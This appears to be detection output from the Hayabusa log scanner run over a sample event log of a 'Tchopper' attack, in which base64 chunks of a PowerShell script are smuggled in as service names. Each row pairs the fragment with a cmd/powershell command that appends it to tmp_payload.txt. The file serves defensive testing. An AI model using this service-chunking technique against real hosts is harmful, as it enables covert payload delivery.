+2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
